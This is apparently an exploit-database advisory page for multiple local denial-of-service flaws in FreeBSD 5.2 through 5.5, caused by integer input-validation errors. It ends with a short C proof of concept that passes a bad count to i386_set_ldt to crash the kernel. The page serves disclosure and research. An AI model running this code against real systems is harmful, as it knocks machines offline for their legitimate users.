FreeBSD Local Denial-of-Service Vulnerabilities

vendor:

FreeBSD

by:

SecurityFocus

7.2

CVSS

HIGH

Denial-of-Service

400

CWE

Product Name: FreeBSD

Affected Version From: 5.2

Affected Version To: 5.5

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2005

FreeBSD Local Denial-of-Service Vulnerabilities

FreeBSD is prone to multiple local denial-of-service vulnerabilities. These issues occur because of input-validation flaws related to the handling of integers. An attacker may leverage these issues to cause the affected computer to crash, denying service to legitimate users.

Mitigation:

Input validation should be performed to ensure that user-supplied data is properly sanitized.

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/20158/info

FreeBSD is prone to multiple local denial-of-service vulnerabilities. These issues occur because of input-validation flaws related to the handling of integers.

An attacker may leverage these issues to cause the affected computer to crash, denying service to legitimate users.

Versions 5.2 through 5.5 are vulnerable to these issues; other versions may also be affected.

#include <stdio.h>
#include <stdlib.h>
#include <machine/segments.h>
#include <machine/sysarch.h>

int main(int argc,char **argv){

    if(i386_set_ldt(LUDATA_SEL+1,NULL,-1)==-1){
        perror("i386_set_ldt");
        exit(EXIT_FAILURE);
    }

    exit(EXIT_FAILURE);
}